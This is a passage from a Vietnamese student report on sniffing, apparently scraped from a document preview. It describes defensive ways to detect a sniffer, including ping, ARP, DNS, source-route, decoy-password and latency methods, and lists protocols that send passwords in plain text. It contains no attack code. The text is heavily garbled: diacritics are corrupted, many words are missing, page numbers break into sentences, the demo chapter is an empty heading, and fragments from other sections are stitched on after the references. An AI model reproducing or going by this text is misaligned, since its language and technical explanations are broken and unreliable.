động nhầm (không phải trường hợp công mà gây báo động) Phương pháp ping Hầu hết chương trình Sniffer cài đặt máy tính mạng sử dụng TCP/IP Stack Bởi bạn gửi yêu cầu đến máy tính này, chúng phản hồi lại cho bạn kết Bạn gửi yêu cầu phản hồi tới địa IP máy tính mạng (máy mà bạn cần kiểm tra xem có bị cài đặt Sniffer hay khơng), khơng thơng qua Adapter Ethernet Phương pháp Arp 27 Phương pháp phát Sniffer tương tự phương pháp dùng Ping Khác biệt chỗ sử dụng Packet ARP Bạn tim thấy hướng dẫn chi tiết cụ thể với chương trình kèm hỗ trợ việc phát Sniffer theo phương pháp :http://www.apostols.org/projectz/neped / Đơn giản bạn cần gửi Packet ARP đến địa mạng (khơng phải Broadcast) Nếu máy tính trả lời lại Packet ARP địa Thì máy tính cài đặt Sniffer chế độ hỗn tạp(Promiscuous Mode) Mỗi Packet ARP chứa đầy đủ thông tin người gửi người nhận Khi Hacker gửi Packet ARP đến địa loan truyền tin (Broadcast Address), bao gồm thơng tin địa IP bạn địa MAC phân giải Ethernet Ít phút sau máy tính hệ thống mạng Ethernet nhớ thơng tin Bởi Hacker gửi Packet ARP không qua Broadcast Address Tiếp ping đến Broadcast Address Lúc máy tính trả lời lại mà không ARPing, chụp thơng tin địa MAC máy tính cách sử dụng Sniffer để chụp khung ARP (ARP Frame) Phương pháp sử dụng DNS Rất nhiều chương trình Sniffer có tính phân giải ngược địa IP thành DNS mà chúng nhìn thấy (như dsniff) Bởi quan sát lưu lượng truyền thơng DNS bạn phát Sniffer chế độ hỗn tạp(Promiscuous Mode) Để thực phương pháp này, bạn cần theo dõi trình phân giải ngược DNS Server bạn Khi bạn phát hành động Ping liên tục với mục đích thăm dị đến địa IP không tồn hệ thống mạng bạn Tiếp hành động cố gắng phân giải ngược địa IP biết từ Packet ARP Khơng khác hành động chương trình Sniffer Phương pháp Source Route Phương pháp sử dụng thông tin địa nguồn địa đích Header IP để phát hành động Sniff đoạn mạng 28 Tiến hành ping từ máy tính đến máy tính khác Nhưng tính Routing máy tính nguồn phải vơ hiệu hố Hiểu đơn giản làm để gói tin khơng thể đến đích Nếu bạn thấy trả lời, đơn giản hệ thống mạng bạn bị cài đặt Sniffer Để sử dụng phương pháp bạn cần sử dụng vào vài tuỳ chọn Header IP Để Router bỏ qua địa IP đến tiếp tục chuyển tiếp đến địa IP tuỳ chọn Source- Route Router Lấy ví dụ cụ thể : Bob Anna nằm đoạn mạng Khi có người khác đoạn mạng gửi cho cô ta vài Packet IP nói chuyển chúng đến cho Bob Anna khơng phải Router, cho lên cô ta Drop tất Packet IP mà người muốn chuyển tới Bob (bởi cô ta làm việc này) Một Packet IP không gửi đến Bob, mà trả lời lại Điều vơ lý, sử dụng chương trình Sniffer 10 Phương pháp giăng bẫy (decoy) Tương tự phương pháp sử dụng ARP sử dụng phạm vi mạng rộng lớn (gần khắp nơi) Rất nhiều giao thức sử dụng Password không mã hoá đường truyền, Hacker coi trọng Password này, phương pháp giăng bẫy thoả mãn điều Đơn giản bạn cần giả lập Client sử dụng Service mà Password không mã hố : POP, FTP, Telnet, IMAP…Bạn cấu hình User khơng có quyền hạn, hay chí User khơng tồn tại.Khi Sniff thơng tin coi «quý giá» Hacker tìm cách kiểm tra, sử dụng khai thác chúng…Bạn làm gí ??? Để biết thêm thơng tin phương pháp thú vị bạn tham khảo trang thông tin:http://www.zurich.ibm.com/~dac/Prog_… html/index.htm 11 Phương pháp kiểm tra châm trễ gói tin (Latency) Phương pháp làm giảm thiểu lưu thông hệ thống mạng bạn Bằng cách gửi lượng thông tin lớn đến máy tính mà bạn nghi bị cài đặt Sniffer Sẽ khơng có hiệu ứng gí đáng kể máy tính hồn tồn khơng có Bạn ping đến máy tính mà bạn nghi ngờ bị cài đặt Sniffer trước thời gian chịu tải thời gian chị tải Để quan sát khác thời điểm 29 Tuy nhiên phương pháp tỏ không hiệu Bản thân Packet IP gửi đường truyền gây trậm trễ thất lạc Cũng Sniffer chạy chế độ “User Mode” xử lý độc lập CPU cho kết khơng xác Do mà tài liệu có tính chất giới thiệu Sniffer, nên không đề cập đến cách thức để sử dụng Sniffer hệ thống mạng Tuy nhiên tơi nêu qua hệ thống mạng bị Sniffer: Mã: – Cable Modem – DSL – ADSL – Switched Network – Wireless like IEEE 802.11 a.k.a AirPort (hệ thống mạng không dây) Những giao thức mà thơng tin Password khơng mã hố, nguy hiểm bị Sniffer: Mã: – Telnet, Rlogin – SNMP – NNTP – POP, IMAP, SMTP – FTP CHƯƠNG 3: DEMO MỘT SỐ PHƯƠNG PHÁP TẤN CƠNG SNIFFING 3.1 Mơ hình minh họa TÀI LIỆU THAM KHẢO [1] Lê Đình Thích, Hồng Sỹ Tương, An tồn mạng máy tính, Học viện kỹ thuật mật mã, 2013 [2] Đặng Trường Sơn, Các kiểu công mạng, Đại học Ngoại ngữ tin học TPHCM, 2010 [3] Ngô Xuân Giang, Kỹ thuật cơng phịng thủ khơng gian mạng, Viện nghiên cứu an ninh mạng, 2012 30 [4] Lê Bảo Long, Tìm hiểu an ninh mạng kỹ thuật Sniffer, Cao đẳng CNTT hữu nghị Việt Hàn, 2012 [5] Nguyễn Hiếu Minh, Tấn cơng mạng máy tính, Học viện kỹ thuật quân 31 ... pháp công mạng cách phòng chống điều tất yếu Bài báo cáo “NGHIÊN CỨU CÁC PHƯƠNG PHÁP TẤN CÔNG SNIFFER? ?? thực nhằm tìm hiểu kiểu công phổ biến mạng Cụ thể, báo cáo sâu vào nghiên cứu phương pháp công. .. tin cậy hệ thống Các kiểu công mạng phổ biến Có nhiều kiểu cơng mạng để xâm nhập vào hệ thống máy tính, phổ biến thường kiểu công sau đây: Tấn công trực tiếp: Những công trực tiếp thông thường... tâm VNCERT ghi nhận 6.303 công mạng vào hệ thống thông tin Việt Nam, bao gồm 1.522 công lừa đảo, 3.792 công cài đặt phần mềm độc hại 989 công thay đổi giao diện Tổng số công mạng vào hệ thống thông
